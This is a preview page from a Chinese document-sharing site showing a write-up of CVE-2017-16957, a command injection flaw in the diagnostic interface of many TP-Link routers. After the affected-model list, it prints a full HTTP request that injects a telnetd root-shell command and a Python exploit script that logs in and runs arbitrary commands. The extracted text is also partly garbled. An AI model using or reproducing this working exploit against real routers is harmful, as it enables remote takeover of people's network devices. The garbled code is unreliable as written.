（CVE-2017-16957）TP-Link 命令注入漏洞.docx

上传人：王**

文档编号：497085

上传时间：2023-09-21

格式：DOCX

页数：19

大小：24.95KB

《（CVE-2017-16957）TP-Link 命令注入漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2017-16957）TP-Link 命令注入漏洞.docx（19页珍藏版）》请在优知文库上搜索。

1、(CVE-2017-16957) TPLink 命令注入漏洞一、漏洞简介TP-LinkTL-WVR等都是中国普联(TP-LINK)公司的无线路由器产品。多款TP-Link产品中存在命令注入漏洞。远程攻击者可通过向cgi-bin/luci发送 face字段中带有shell元字符的admin/diagnostic命令利用该漏洞执行任意命令。二、漏洞影响TP-LINK TL-WVR TP-LINK TL-WVR300 v4 TP-LINK TL-WVR302 v2 TP-LINK TL- WVR450 TP-LINK TL-WVR450L TP-LINK TL-WVR450G v5 TP-LINK

2、TL-WVR458 TP-LINK TL-WVR458L TP-LINK TL-WVR458P TP-LINK TL-WVR900G v3 TP-LINK TL-WVR1200L TP-LINK TL-WVR900L TP-LINK TL-WVR1300L TP-LINK TL- WVR1300G TP-LINK TL-WVR1750L TP-LINK TL-WVR2600L TP-LINK TL- WVR4300L TP-LINK TL-WAR450 TP-LINK TL-WAR302 TP-LINK TL-WAR2600L TP- LINK TL-WAR1750L TP-LINK TL-W

3、AR1300L TP-LINK TL-WAR1200L TP-LINK TL- WAR900L TP-LINK TL-WAR458 TP-LINK TL-WAR450L TP-LINK TL-ER5510G v2 TP-LINK TL-ER5510G v3 TP-LINK TL-ER5520G v2 TP-LINK TL-ER5520G v3 TP- LINK TL-ER6120G v2 TP-LlNK TL-ER6520G v2 TP-LINK TL-ER6520G v3 TP-LINK TL-ER3210G TP-LINK TL-ER7520G TP-LINK TL-ER6520G TP-

4、LINK TL-ER6510G TP- LINKTL-ER6220G TP-LINK TL-ER6120G TP-LINK TL-ER6110G TP-LINK TL- ER5120G TP-LINK TL-ER5110G TP-LINK TL-ER3220G TP-LINK TL-R479P-AC TP- LINK TL-R478G+ TP-LINK TL-R478G TP-LINK TL-R478+ TP-LINK TL-R478 TP-LINK TL-R473GP-AC TP-LINK TL-R473P-AC TP-LINK TL-R473G TP-LINK TL-R473 TP- LI

5、NKTL-R4299G TP-LINK TL-R4239G TP-LINK TL-R4149G TP-LINK TL-R488 TP- LINK TL-R483 TP-LINK TL-R483G TP-LINK TL-R479GP-AC TP-LlNK TL-R479GPE- AC三、复现过程POST cgi-bin/luciJstok=ea2178b4514da7ae227f4ecl92536930admindiagnos tic?form=diag HTTP1.1Host: 0-sec.orgContent-Length: 370Accept: applicationjsonj text/

6、javascript, */*; q=0.01 Origin: http:/192.168.3.1 X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; 64) AppleWebKit/537.3 6 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http:/192.168.3.1/

7、webpages/index.html Accept-Encoding: gzip, deflateCookie: Sysauth=be9b6f2b4b9a76a8a658el08c6197f2c Connection: closedata=%7B%22method%22%3A%22start%22%2C%22params%22%3A%7B%22type%22%3A%22 0%22%2C%22type_hidden%22%3A%220%22%2C%22ipaddr_ping%22%3A%2 2%2C%22iface-ping%22%3A%22WANl%22%2C%22ipaddr%22%3A%

8、22%2C%2 2iface%22%3A%22%3Btelnetd+-p+24+-l+binsh%22%2C%22count%22%3A%221%22%2 C%22pktsize%22%3A%2264%22%2C%22my-result%22%3A%22The+Router+is+ready.%5 Cr%5Cn%22%7D%7D漏洞脚本# Tested product: TL-WVR450L# Hardware version： VI.0# Firmware version: 20161125# The RSA_Encryption_For_Tplink.js is use for Rsa E

9、ncryption to the pas sword when login the web manager.# You can download the RSA_Encryption_For_Tplink.js by https:/github.c omcoincoin7Wireless-Router-Vulnerability/blob/master/RSA_Encryption_F OjTplink jsimport execjsimport requestsimport jsonimport urllib def read_js():file = open(,. /RSA_Encrypt

10、ion_For_Tplink. js, , r,) line = file.readline()js =while line:js = js + lineline = file.readline()file.close()return js def eecute(ipj port, username, passwdj cmd):try:s = requests. session()uri = http：/：.format (ip, port)headers = Content-Type,:,application/x-www-form-urlencoded; charset= UTF-8,Re

11、ferer1: httprwebpageslogin.html.format(ip)payload = method :get,ret = s.post(uri + ,cgi-binluci;Stok=ZloginPform=Iogin,j dat a=urllib.urlencode(data:json.dumps(payload), headers=headers, time out=5)rsa_public_n = json.loads(ret.text)resultpassword0.en codeCutf-S)rsa_public_e = json.loads(ret.text),r

12、esult,password,1.en code(utf-8)js = read_js()js_handle = pile(js)password = js_handle.call(MainEncrypt, rsa_public_n, rsa_publ ic_e, passwd)payload method:login,params:username:, .format (username)jpassword: .format(password)ret = s.post(uri + ,cgi-binluci;Stok=ZloginPform=Iogin, dat a=rllib.urlenco

13、de(data:json.dumps(payload), headers=headersj time out=5)stok = json.loads(ret.text)result,stok,. encode(utf-8,)cookie = ret.headersSet-Cookie1print ,+ Login success, print ,+ Get The Token: + stok print ,+ Get The Cookie: , + cookieheaders = Content-Type,:application/x-www-form-urlencoded; charset=

14、 UTF-8,Referer:,httpzwebpageslogin.html,. format (ip)j Cookie:,.format(cookie) payload = method:start,params:typez0,type-hiddenz,0ipaddr_ping:127.0.0.1,iface-ping,r,WANl,ipaddri,127.0.0.1, ,iface format (cmd), “count： T,“pktsize”：“64”， ,my-resulti,exploit)ret = s.post(uri + ,cgi-binluci;stok=/admin/

15、diagnostic?for m=diag.format(stok), data=urllib.urlencode(data:json.dumps(payloa d), headers=headers, timeout=5)#print ret.textprint + Finish RCEprint ,return Trueexcept:return False if _name_=_main_:print ,Tplink LUCI diagnostic Authenticated RCEIprint execute(,192.168.1.1,j 80j ,admin,i admin,i telnetd -p 24 - 1 binsh,)RSA_Encryption_For_Tplink.js 文件/ Copyright (c) 2005 Tom WU/ All Righ

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

5 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2017-16957TP-Link 命令注入漏洞 CVE 2017 16957 TP Link 命令注入漏洞

优知文库所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2017-16957）TP-Link 命令注入漏洞.docx
链接地址：https://www.yzwku.com/doc/497085.html